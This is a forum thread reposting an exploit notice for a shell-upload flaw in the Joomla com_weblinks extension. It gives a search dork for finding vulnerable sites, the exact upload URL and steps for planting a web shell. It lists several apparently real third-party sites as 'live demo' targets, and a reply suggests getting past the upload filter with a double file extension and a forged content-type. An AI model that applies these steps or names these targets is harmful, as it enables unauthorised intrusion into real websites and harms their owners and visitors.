hades Posted July 26, 2016 Report Posted July 26, 2016 ################################################################ # Exploit Title : Joomla com_weblinks Shell Upload Vulnerability # Exploit Author : howucan # Website : http://howucan.gr # Dork : allinurl:/index.php?option e_name jform_description asset=com_weblinks # Software link : http://extensions.joomla.org/extensions/extension/official-extensions/weblinks # Tested on: [ Kali Linux 2 ] # Date: 2016/07/24 # video Proof : https://www.youtube.com/watch?v=rHM8XJUhBzQ # ###################### # [+] PoC : ###################### # 1 Select A Website From The Dork Above # 2 http://localhost/site/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author= # 3 Just Upload your Shell or Txt or Image to Upload Field # 4 Shell Directory : http://localhost/site/images/shell.txt # Ex http://www.verenikelife2009.gr/images/a.txt ###################### # [+] Live Demo: # http://www.orrca.org.au/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author= # http://egyptfuntours.com/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author= # http://englishshotokan.net/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author= ################################################################# via 2 Quote
mesterel Posted November 21, 2016 Report Posted November 21, 2016 Frumos dar imposibil de urcat altceva afara de o poza sau un text document.. PHP? nici o sansa.. Quote
hades Posted November 21, 2016 Author Report Posted November 21, 2016 shell.php.jpg poate si un content-type: application/php Quote
